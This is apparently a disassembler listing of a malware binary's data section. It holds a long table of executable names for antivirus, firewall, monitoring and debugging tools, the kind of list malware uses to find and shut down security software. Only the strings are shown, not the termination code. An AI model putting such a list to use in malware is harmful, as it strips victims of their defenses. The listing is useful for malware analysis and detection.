aPccwin98_exe db 'PCCWIN98.EXE',0 ; DATA XREF: .text:0042F340�o
align 10h
aPccwin97_exe db 'PCCWIN97.EXE',0 ; DATA XREF: .text:0042F33C�o
align 10h
aPccntmon_exe db 'PCCNTMON.EXE',0 ; DATA XREF: .text:0042F338�o
align 10h
aPcciomon_exe db 'PCCIOMON.EXE',0 ; DATA XREF: .text:0042F334�o
align 10h
aPcc2k_76_1436_ db 'PCC2K_76_1436.EXE',0 ; DATA XREF: .text:0042F330�o
align 4
aPcc2002s902_ex db 'PCC2002S902.EXE',0 ; DATA XREF: .text:0042F32C�o
aPavw_exe db 'PAVW.EXE',0 ; DATA XREF: .text:0042F328�o
align 10h
aPavsched_exe db 'PAVSCHED.EXE',0 ; DATA XREF: .text:0042F324�o
align 10h
aPavproxy_exe db 'PAVPROXY.EXE',0 ; DATA XREF: .text:0042F320�o
align 10h
aPavcl_exe db 'PAVCL.EXE',0 ; DATA XREF: .text:0042F31C�o
align 4
aPatch_exe db 'PATCH.EXE',0 ; DATA XREF: .text:0042F318�o
align 4
aPanixk_exe db 'PANIXK.EXE',0 ; DATA XREF: .text:0042F314�o
align 4
aPadmin_exe db 'PADMIN.EXE',0 ; DATA XREF: .text:0042F310�o
align 10h
aOutpostproinst db 'OUTPOSTPROINSTALL.EXE',0 ; DATA XREF: .text:0042F30C�o
align 4
aOutpostinstall db 'OUTPOSTINSTALL.EXE',0 ; DATA XREF: .text:0042F308�o
align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .text:0042F300�o
; .text:0042F304�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .text:0042F2FC�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .text:0042F2F8�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .text:0042F2F4�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .text:0042F2F0�o
align 10h
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .text:0042F2EC�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .text:0042F2E8�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .text:0042F2E4�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .text:0042F2E0�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .text:0042F2DC�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .text:0042F2D8�o
align 10h
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .text:0042F2D4�o
align 10h
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .text:0042F2CC�o
; .text:0042F2D0�o
align 10h
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .text:0042F2C8�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .text:0042F2C4�o
align 4
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .text:0042F2C0�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .text:0042F2BC�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .text:0042F2B8�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .text:0042F2B4�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .text:0042F2B0�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .text:0042F2AC�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .text:0042F2A8�o
align 4
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .text:0042F2A4�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .text:0042F2A0�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .text:0042F29C�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .text:0042F298�o
align 4
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .text:0042F294�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .text:0042F290�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .text:0042F28C�o
align 4
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .text:0042F288�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .text:0042F284�o
align 10h
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .text:0042F280�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .text:0042F27C�o
align 4
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .text:0042F278�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .text:0042F274�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .text:0042F270�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .text:0042F26C�o
align 4
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .text:0042F268�o
align 4
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .text:0042F264�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .text:0042F260�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .text:0042F25C�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .text:0042F258�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .text:0042F254�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .text:0042F250�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .text:0042F24C�o
align 4
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .text:0042F248�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .text:0042F244�o
align 10h
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .text:0042F240�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .text:0042F23C�o
align 4
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .text:0042F238�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .text:0042F234�o
align 10h
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .text:0042F230�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .text:0042F22C�o
align 4
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .text:0042F228�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .text:0042F224�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .text:0042F220�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .text:0042F21C�o
align 4
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .text:0042F218�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .text:0042F214�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .text:0042F210�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .text:0042F20C�o
align 4
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .text:0042F208�o
align 4
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .text:0042F204�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .text:0042F200�o
align 10h
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .text:0042F1FC�o
align 10h
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .text:0042F1F8�o
align 10h
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .text:0042F1F4�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .text:0042F1F0�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .text:0042F1EC�o
align 4
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .text:0042F1E8�o
align 4
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .text:0042F1E4�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .text:0042F1E0�o
align 10h
aMsconfig_exe_0 db 'MSCONFIG.EXE',0 ; DATA XREF: .text:0042F1DC�o
align 10h
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .text:0042F1D8�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .text:0042F1D4�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .text:0042F1D0�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .text:0042F1CC�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .text:0042F1C8�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .text:0042F1C4�o
align 4
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .text:0042F1C0�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .text:0042F1BC�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .text:0042F1B8�o
align 10h
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .text:0042F1B4�o
align 10h
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .text:0042F1B0�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .text:0042F1AC�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .text:0042F1A8�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .text:0042F1A4�o
align 10h
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .text:0042F1A0�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .text:0042F19C�o
align 4
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .text:0042F198�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .text:0042F194�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .text:0042F190�o
align 10h
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .text:0042F18C�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .text:0042F188�o
align 10h
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .text:0042F184�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .text:0042F180�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .text:0042F17C�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .text:0042F178�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .text:0042F170�o
; .text:0042F174�o
align 10h
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .text:0042F16C�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .text:0042F168�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .text:0042F164�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .text:0042F160�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .text:0042F15C�o
align 4
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .text:0042F158�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .text:0042F154�o
align 10h
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .text:0042F150�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .text:0042F14C�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .text:0042F144�o
; .text:0042F148�o
align 4
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .text:0042F140�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .text:0042F13C�o
align 10h
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .text:0042F138�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .text:0042F134�o
align 10h
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .text:0042F130�o
align 10h
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .text:0042F12C�o
align 10h
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .text:0042F128�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .text:0042F124�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .text:0042F120�o
align 4
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .text:0042F11C�o
align 4
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .text:0042F118�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .text:0042F114�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .text:0042F110�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .text:0042F10C�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .text:0042F108�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .text:0042F104�o
align 4
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .text:0042F100�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .text:0042F0FC�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .text:0042F0F8�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .text:0042F0F4�o
align 4
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .text:0042F0F0�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .text:0042F0EC�o
align 4
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .text:0042F0E8�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .text:0042F0E4�o
align 4
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .text:0042F0E0�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .text:0042F0DC�o
align 10h
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .text:0042F0D8�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .text:0042F0D4�o
align 4
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .text:0042F0D0�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .text:0042F0CC�o
align 10h
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .text:0042F0C8�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .text:0042F0C4�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .text:0042F0C0�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .text:0042F0BC�o
align 10h
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .text:0042F0B8�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .text:0042F0B4�o
align 4
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .text:0042F0B0�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .text:0042F0AC�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .text:0042F0A8�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .text:0042F0A4�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .text:0042F0A0�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .text:0042F09C�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .text:0042F098�o
align 4
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .text:0042F094�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .text:0042F090�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .text:0042F088�o
; .text:0042F08C�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .text:0042F084�o
align 10h
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .text:0042F080�o
align 10h
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .text:0042F07C�o
align 10h
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .text:0042F078�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .text:0042F074�o
align 4
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .text:0042F070�o
align 4
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .text:0042F06C�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .text:0042F068�o
align 10h
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .text:0042F064�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .text:0042F060�o
align 4
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .text:0042F05C�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .text:0042F058�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .text:0042F054�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .text:0042F050�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .text:0042F04C�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .text:0042F048�o
align 4
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .text:0042F044�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .text:0042F040�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .text:0042F03C�o
align 4
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .text:0042F038�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .text:0042F034�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .text:0042F030�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .text:0042F02C�o
align 4
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .text:0042F028�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .text:0042F024�o
align 10h
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .text:0042F020�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .text:0042F01C�o
align 4
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .text:0042F018�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .text:0042F014�o
align 10h
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .text:0042F010�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .text:0042F00C�o
align 10h
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .text:0042F008�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .text:0042F004�o
align 10h
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .text:0042F000�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .text:0042EFFC�o
align 4
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .text:0042EFF8�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .text:0042EFF4�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .text:0042EFF0�o
align 10h
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .text:0042EFEC�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .text:0042EFE8�o
align 4
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .text:0042EFE4�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .text:0042EFE0�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .text:0042EFDC�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .text:0042EFD8�o
align 4
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .text:0042EFD4�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .text:0042EFD0�o
align 10h
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .text:0042EFCC�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .text:0042EFC8�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .text:0042EFC4�o
align 4
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .text:0042EFC0�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .text:0042EFBC�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .text:0042EFB8�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .text:0042EFB4�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .text:0042EFB0�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .text:0042EFAC�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .text:0042EFA8�o
align 10h
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .text:0042EFA4�o
align 10h
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .text:0042EFA0�o
align 10h
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .text:0042EF9C�o
align 10h
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .text:0042EF98�o
align 10h
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .text:0042EF94�o
align 10h
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .text:0042EF90�o
align 10h
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .text:0042EF8C�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .text:0042EF88�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .text:0042EF84�o
align 10h
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .text:0042EF80�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .text:0042EF7C�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .text:0042EF78�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .text:0042EF74�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .text:0042EF70�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .text:0042EF6C�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .text:0042EF68�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .text:0042EF64�o
align 10h
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .text:0042EF60�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .text:0042EF5C�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .text:0042EF58�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .text:0042EF54�o
align 10h
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .text:0042EF50�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .text:0042EF4C�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .text:0042EF48�o
align 4
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .text:0042EF44�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .text:0042EF40�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .text:0042EF3C�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .text:0042EF38�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .text:0042EF34�o
align 10h
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .text:0042EF30�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .text:0042EF28�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .text:0042EF24�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .text:0042EF20�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .text:0042EF1C�o
align 10h
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .text:0042EF18�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .text:0042EF14�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .text:0042EF10�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .text:0042EF0C�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .text:0042EF08�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .text:0042EF04�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .text:0042EF00�o
align 4
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .text:0042EEFC�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .text:0042EEF8�o
align 10h
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .text:0042EEF4�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .text:0042EEF0�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .text:0042EEEC�o
align 4
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .text:0042EEE8�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .text:0042EEE4�o
align 10h
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .text:0042EEE0�o
; .text:0042EF2C�o
align 10h
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .text:0042EEDC�o
align 10h
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .text:0042EED8�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .text:0042EED0�o
; .text:0042EED4�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .text:0042EECC�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .text:0042EEC8�o
align 4
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .text:0042EEC4�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .text:0042EEC0�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .text:0042EEBC�o
align 4
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .text:0042EEB8�o
align 4
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .text:0042EEB4�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .text:0042EEB0�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .text:0042EEAC�o
align 4
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .text:0042EEA8�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .text:0042EEA4�o
align 10h
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .text:0042EEA0�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .text:0042EE9C�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .text:0042EE98�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .text:0042EE94�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .text:0042EE90�o
align 10h
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .text:0042EE8C�o
align 10h
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .text:0042EE88�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .text:0042EE84�o
align 4
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .text:0042EE80�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .text:0042EE7C�o
align 4
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .text:0042EE78�o
align 4
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .text:0042EE74�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .text:0042EE70�o
align 10h
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .text:0042EE6C�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .text:0042EE68�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .text:0042EE64�o
align 10h
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .text:0042EE60�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .text:0042EE58�o
; .text:0042EE5C�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .text:0042EE54�o
align 4
